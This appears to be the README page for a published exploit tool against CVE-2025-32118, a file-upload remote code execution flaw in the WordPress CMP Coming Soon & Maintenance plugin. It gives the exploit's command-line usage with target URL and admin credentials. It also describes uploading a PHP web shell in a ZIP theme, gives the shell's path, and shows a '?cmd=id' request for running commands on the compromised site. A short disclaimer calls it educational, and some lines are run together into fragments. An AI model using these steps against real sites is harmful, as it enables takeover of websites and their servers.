
WordPress CMP – Coming Soon & Maintenance plugin <= 4.1.13 - Remote Code Execution (RCE) vulnerability
🔍 Title: WordPress CMP – Coming Soon & Maintenance plugin <= 4.1.13 - Remote Code Execution (RCE)
🗓️ Published: 2025-04-04
🔐 CWE: CWE-434 - Unrestricted Upload of File with Dangerous Type
📊 CVSS: 9.1 (CRITICAL) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
A critical Remote Code Execution (RCE) vulnerability exists in the CMP – Coming Soon & Maintenance plugin for WordPress (<= 4.1.13).
This flaw allows an authenticated admin user to upload malicious ZIP files containing executable PHP shells, leading to full site compromise.
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Flag | Description |
|---|---|
-u | Base URL of WordPress site |
-un | username |
-p | password |
nonce for upload request.style.css (valid theme format)nxploitedshell.php (RCE payload)?cmd=whoami.Once uploaded successfully, the shell will be located at:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
Test it via:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
This exploit is for educational purposes only.
Unauthorized use of this code against systems you don't own is illegal and unethical.
Nxploited | Khaled Alenazi